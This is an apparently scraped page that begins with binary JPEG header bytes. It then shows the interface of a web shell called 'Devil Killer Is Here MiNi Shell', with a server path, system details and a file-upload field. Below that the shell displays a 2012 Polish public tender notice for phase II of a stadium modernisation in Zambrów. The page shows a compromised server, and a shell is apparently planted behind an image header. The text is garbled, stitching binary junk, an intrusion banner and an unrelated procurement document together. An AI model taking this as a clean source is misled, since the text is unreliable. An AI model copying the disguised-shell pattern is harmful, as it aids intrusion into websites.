JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120709/241770-N-2012.html

<p class="kh_header"><b>Zambrów: Budowa- Modernizacja Stadionu  Etap II</b><br>
<b>Numer ogłoszenia: 241770 - 2012; data zamieszczenia: 09.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Zambrów , ul. Fabryczna 3, 18-300 Zambrów, woj. podlaskie, tel. 0862712210 w. 16, faks 086 2712117.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zambrow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa- Modernizacja Stadionu  Etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
Modernizacja stadionu w Zambrowie przy ulicy Prymasa Stefana Wyszyńskiego -   II ETAP w zakresie wykonania prac:
-	renowacja boiska do piłki nożnej o nawierzchni z trawy naturalnej o wymiarach boiska : 105m x 68m, 
-	wyposażenie  boiska:  dwie bramki  pełnowymiarowe 7,32x2,44 wykonane z profilu aluminiowego, siatki do bramki (białe), piłkochwyty - kpl.2, kabiny dla zawodników rezerwowych szt.2, kabina dla sędziów szt.1,
-	demontaż istniejącej trybuny, nawierzchni, ogrodzeń oraz wszystkich innych elementów niezbędnych do wykonania zakresu robót,
-	budowa   trybuny z prefabrykatów żelbetowych wraz z zadaszeniem oraz kabiną  spikera,
-	wyposażenie trybun w siedziska  dla obiektów sportowych z oparciem,
-	nagłośnienie trybun stadionu,
-	oświetlenie trybun i ciągu pieszo jezdnego,
-	ciąg pieszo jezdny  z kostki brukowej Behaton gr.8cm w kolorach: grafit oraz beż  na podsypce cem.piaskowej na podbudowie zaprojektowanej pod nawierzchnię  z asfaltobetonu,
-	chodniki z kostki  betonowej ,
-	dojście przy trybunie z betonu,
-	ogrodzenie terenu boiska ,terenu oddzielającego trybuny od pasażu oraz balustrady na trybunach,
-	odwodnienie terenu wokół boiska piłkarskiego, odwodnienie z zadaszenia  trybuny oraz ciągów komunikacyjnych,
-	zieleń.
w obszarze  etapu II Modernizacji stadionu oznaczonego na załączniku graficznym literami   A i B.
1) Wymogi w zakresie wykonania nawierzchni z trawy naturalnej
Konstrukcja podbudowy boiska:         podbudowa istniejąca.
Nawierzchnia wraz z podbudową:
-	trawa z rolki wys.min. 4-5cm,
-	warstwa wegetacyjna gr.min.20cm
Przygotowanie podbudowy - po zdjęciu warstwy wegetacyjnej należy dokonać pomiarów wysokościowych podbudowy za pomocą niwelatora laserowego w celu jej wyprofilowania i uzyskania spadków poprzez ukształtowanie istniejącej podbudowy i ewentualne dosypanie warstwy pospółki. Podbudowa winna posiadać spadki 0,3% od środka boiska do boków oraz kopertowo do linii bramkowych. Tak wyprofilowana podbudowę należy przewałować w celu uzyskania twardej, a zarazem przepuszczalnej warstwy, a ewentualne zagłębienia powstałe w wyniku wałowania uzupełniać sukcesywnie pospółka do uzyskania jednolitej, równej powierzchni. Podłoże, na którym ma być układana nawierzchnia z trawy, powinno być przygotowane zgodnie z wiedzą techniczną i sztuką budowlaną, winno być suche, równe, pozbawione zanieczyszczeń i ustabilizowane. 

Przygotowanie warstwy wegetacyjnej - zgodnie z  dokumentacją projektową -opis techniczny w projekcie drogi i ukształtowanie.
Wykonanie nawierzchni z trawy - po wykonaniu robót rozbiórkowych oraz robót związanych z przygotowaniem podłoża pod nową murawę należy przystąpić do montażu trawy. Montaż rozpoczyna się od pokrycia warstwy wegetacyjnej warstwą nawozu przyspieszającego wegetacje. Bezpośrednio po tym zabiegu układa się trawę  z rolki przygotowana przez producenta. Do rozwijania rolek stosuje się specjalistyczna maszynę obsługiwana przez zespół wykwalifikowanych monterów, którzy dbają o dokładne dopasowanie wszystkich połączeń. Niezwłocznie po montażu danej partii murawy trawę należy nawodnić, aby umożliwić rozpoczęcie procesu adaptacji. Trawa przed ułożeniem winna być odebrana przez Zamawiającego. 

Wymogi w zakresie wykonania  trawy naturalnej:
Produkcja trawy:
Obsiewana i przemysłowo pielęgnowana darń murawy naturalnej powinna być przygotowana przez firmę specjalistyczną. Bezwzględnym warunkiem  złożenia oferty i uczestnictwa w przetargu jest posiadanie przez Wykonawcę rezerwacji murawy, która zostanie wykorzystana do wbudowania na płycie boiska. Dokument roboczo zwany paszportem( który należy załączyć do oferty) jest potwierdzeniem posiadania murawy przeznaczonej na realizowane zadanie.
Paszport darni powinien określać: 
wiek darni ( datę wysiewu), lokalizację,mieszankę nasion.
Darń nie może zawierać wzmocnienia  hodowlanego przy użyciu np.siatki syntetycznej.
Instalacja darni musi być wykonana za pomocą specjalistycznych rozkładarek.
Wycięcia darni podczas konfekcjonowania muszą  zostać zabezpieczone folią po stronie korzenia na całej długości.
Zamawiający zastrzega sobie możliwość zweryfikowania danych zawartych w paszporcie poprzez dokonanie wizji lokalnej na plantacji.

Skład gatunkowo odmianowy mieszanki - zgodnie z  dokumentacją projektową -opis techniczny w projekcie drogi i ukształtowanie.

Wymagania minimalne dotyczące parametrów darni naturalnej:
- darń przeznaczona do układania maszynowego za pomocą specjalistycznego sprzętu,
-szerokość rolki: 120 cm,
-długość  rolki min.20m,
- grubość 4-5cm
-ciężar ok.23kg/1m
-wiek murawy nie mniejszy niż 1 rok, nie większy niż 2 lata, wiek murawy należy potwierdzić odpowiednim dokumentem( paszportem)

Wykonawca zobowiązany jest załączyć do oferty:
- Autoryzację Producenta murawy na dostawę oferowanej w paszporcie darni wraz z określeniem przeznaczenia ( nazwa inwestycji)
- Paszport  darni określony wyżej.
Zamawiający wymaga , aby nawierzchnia  trawiasta  spełniała normę DIN 18035-4.
Nawierzchnie trawiastą należy położyć najpóźniej 30  dni przed wymaganym terminem zakończenia tj.30.09.2013r. i zagwarantować odpowiednią pielęgnację do ostatecznego odbioru końcowego.
Po ułożeniu nawierzchni trawiastej dalsze zabiegi pielęgnacyjne dotyczą Zamawiającego. Wykonawca przy odbiorze robót, przekaże szczegółową Instrukcje prowadzenia zabiegów pielęgnacyjnych murawy.  z podaniem rodzajów stosowanych nawozów, herbicydów i fungicytów oraz rodzaju sprzętu niezbędnego do pielęgnacji.
Okres udzielonej przez Wykonawcę gwarancji, nie obejmuje prac pielęgnacyjnych nawierzchni  murawy boiska .

2)    Usuniecie istniejącej nawierzchni murawy
Materiał murawy zdjęty ze stadionu, zostanie przewieziony - na odległość ok.3 km. Koszty usunięcia/wywozu poniesie Wykonawca.

3)    Kabiny dla zawodników rezerwowych i kabina dla sędziów
Zadaszona konstrukcja stalowo-aluminiowa, pokrycie szkło akrylowe gr.3mm. Ustawienie kabin na stałe, z możliwością demontażu w celu  docelowo wykonania bieżni  z poliuretanu (w kolejnym etapie modernizacji stadionu.).Siedziska plastikowe z oparciem, w wybranym przez Zamawiającego kolorze.

Zakres realizacji etapu II budowy -modernizacji stadionu został oznaczony na mapce planu zagospodarowania literami :  A  i B   stanowiącej  załącznik dokumentacji projektowej.

2. Przedmiot zamówienia obejmuje czynności Wykonawcy związane z :
- przewozem gruzu z rozbiórek, we wskazane miejsce przez Zamawiającego na odl.ok.2 km. 
- przewozem  humusu  z   prowadzonych robót ziemnych na odległość  ok.3km  - miejsce 
  wskazane przez Zamawiającego
Cena ofertowa winna obejmować koszt załadunku i przewóz środkami transportowymi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Usuniecie istniejacej murawy za pomoca sprzetu specjalistycznego do ponownego ułożenia we wskazanym przez Zamawiajacego miejscu.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.24-8, 45.23.21.30-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości:  50 000 PLN.  słownie : pięćdziesiąt tysięcy złotych.
2. Wadium może  być wnoszone w jednej lub kilku następujących formach:
1)	w pieniądzu  - przelewem na rachunek bankowy Zamawiającego  nr 8687750009 0010 0101 0201 0002  z dopiskiem:Budowa -Modernizacja stadionu w Zambrowie etap II.za datę  wniesienia wadium w pieniądzu liczy się datę wpływu pieniędzy na konto  Zamawiającego),
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym:
3)	gwarancjach bankowych,
4)	gwarancjach  ubezpieczeniowych
5)	poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5pkt.2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.( Dz.U Nr 109,poz 1158, z póż.zm.)
3. Dowód wniesienia wadium należy dołączyć do oferty w następującej formie; 
    1)     potwierdzenie   wpłaty   lub   przelewu  pieniędzy  na rachunek bankowy  Zamawiającego, w 
            w      formie    kserokopii    poświadczonej   za   zgodność  z    oryginałem    przez     osobę/y  
            upoważnioną/e do reprezentowania wykonawcy lub wykonawcę.
    2)    potwierdzenie   wniesienia   wadium   w   pozostałych     formach określonych  w art.45 ust.6   
           w postaci oryginału dokumentu dołączonego do oferty. 
4.	W  przypadku wspólnego ubiegania się dwóch  lub więcej Wykonawców o udzielenie  niniejszego       
      zamówienia( tj.jako konsorcjum), z treści dokumentu wadium, wnoszonego   w  formie innej   niż   
      pieniężna, powinno wynikać, że  zleceniodawca działa w konsorcjum.
5.	Wadium musi obejmować cały okres związania oferta, wadium wniesione w pieniądzu   Zamawiający przechowuje  na rachunku bankowym.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże,że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności przez Wykonawcę jest krótszy- w tym okresie, zrealizował min. dwa zamówienia związane z budową  boisk z nawierzchni naturalnej  wraz z wyposażeniem, o wartości nie mniejszej niż 2 000 000 PLN każde.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże,  dysponowanie    osobą/osobami       
       posiadającą/ymi   odpowiednie  uprawnienia budowlane bez ograniczeń w specjalności: 
-	drogowej ,   
-	instalacyjnej w zakresie sieci,  instalacji sanitarnych, 
-	instalacyjnej w  zakresie  sieci instalacji i urządzeń elektrycznych i elektroenergetycznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże że:
a)  posiada   środki   finansowe  lub    zdolność   kredytową  o    wartości  nie   mniejszej  niż 1 000 000 PLN .   
c)  posiada  opłacone  ubezpieczenie  od     odpowiedzialności  cywilnej  w   zakresie     prowadzonej    działalności,     związanej z przedmiotem zamówienia, na sumę nie niższą niż    1 000 000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)  Autoryzacja    Producenta    murawy na   dostawę  oferowanej w paszporcie   darni  wraz      z   określeniem przeznaczenia ( nazwa inwestycji)
2) Paszport darni.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz ofertowy                                                            -     załącznik nr 1  do SIWZ
2)	Dokumenty wymienione w  Rozdz. 3 pkt.I niniejszej SIWZ,
3)	Opcjonalnie, jeśli występuje pełnomocnik, pełnomocnictwo dla osoby reprezentującej w niniejszym postępowaniu Wykonawcę lub pełnomocnictwo dla osoby lub podmiotu reprezentującego kilku Wykonawców składających ofertę wspólną,
4)	Dowód wniesienia wadium :
-kopia potwierdzenia dokonania przelewu,
-potwierdzenie wniesienia wadium w pozostałych formach określonych w art.45 ust.6 ustawy Pzp - w formie oryginału.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający    dopuszcza   możliwość  przedłużenia   umownego    terminu wykonania przedmiotu  umowy : 
1) w przypadku  wystąpienia  okoliczności  niezależnych      od Wykonawcy na uzasadniony 
     wniosek    wykonawcy,  pod warunkiem,  że zmiana   ta   wynika z okoliczności,  których 
     wykonawca  nie  mógł   przewidzieć  na     etapie    składania  oferty i  nie jest przez niego  
     zawiniona,
2)	w przypadku braków lub wad dokumentacji projektowej oraz konieczności wprowadzenia przez Projektanta korekt i uściśleń w rozwiązaniach  projektowych,
3) konieczności wykonania zamówień dodatkowych zgodnie z art.67 ust.1 pkt.5 ustawy Pzp, lub robót zamiennych opóźniających lub wstrzymujących realizację robót zasadniczych z przyczyn zależnych od zamawiającego lub organów administracji,
4)  działania siły wyższej ( np.klęski żywiołowe),
5)  wyjątkowo    niesprzyjających   warunków    atmosferycznych,  które   uniemożliwiają  
     wykonanie robót ze względów technologicznych (np. mróz, długotrwałe intensywne  
     opady deszczu,śniegu)
6)  ujawnienia  w  trakcie realizacji  przedmiotu  umowy  niezidentyfikowanej   przeszkody w 
    gruncie   np. nie zinwentaryzowanych podziemnych urządzeń,
Określenie warunków  zmian:
-W okolicznościach wyżej wymienionych Strony ustalają nowe terminy umowne, z tym, że wielkość zmian musi być powiązana z przyczyną jaka ją spowodowała, a termin  może ulec zmianie o okres  odpowiadający wstrzymaniu lub opóźnieniu prac z tego powodu. Okoliczności  mogące spowodować zmianę terminu ,muszą   mieć  odzwierciedlenie w dzienniku budowy i  potwierdzone   przez  inspektora nadzoru.
-W przypadku dokonywania zmian polegających na przedłużeniu terminu wykonania przedmiotu umowy, Wykonawca  najpóźniej w dniu podpisania aneksu do umowy zobowiązany jest do przedłużenia terminu ważności wniesionego zabezpieczenia należytego wykonania umowy, jeżeli zabezpieczenie zostało wniesione  w innej formie niż pieniądz.

2.   Zmian   dotyczących  zakresu w przedmiocie  zamówienia:
Powodem wprowadzenia zmian w zakresie i wartości umowy mogą być roboty zamienne lub zaniechane.
1)    Wprowadzenie robót zamiennych jest możliwe jeśli:
a)	są korzystne dla zamawiającego na etapie realizacji umowy lub przyniosą korzystne skutki w trakcie eksploatacji przedmiotu umowy.
b)	stały się konieczne na skutek ujawnienia przeszkód  w gruncie lub błędów w dokumentacji projektowej,
c)	pozwolą osiągnąć obniżenie kosztów, lepsze parametry techniczne, użytkowe, estetyczne od przyjętych w dokumentacji projektowej,
d)	wystąpiła niedostępność na rynku materiałów lub urządzeń wskazanych w ofercie, dokumentacji projektowej,
e)    pojawienie   się na rynku ,  części,   materiałów    lub    urządzeń       nowszej   generacji 
       pozwalających    na    zaoszczędzenie kosztów    realizacji   przedmiotu   umowy      oraz 
       kosztów eksploatacji wykonanego przedmiotu umowy .
2)    Zaniechanie robót jest możliwe jeśli:
a)    są następstwem zleconych robót dodatkowych ,
b)    nastąpiło  ograniczenie   zakresu   prac  objętych    niniejszą   umową,  w       przypadku 
        stwierdzenia braku konieczności wykonywania części zamówienia.
Określenie warunków zmian:
-Warunkiem dokonania zmian, o których mowa w ppkt.1 jest złożenie wniosku przez Wykonawcę lub Zamawiającego, zawierającego opis propozycji zmian i uzasadnienie zmian.
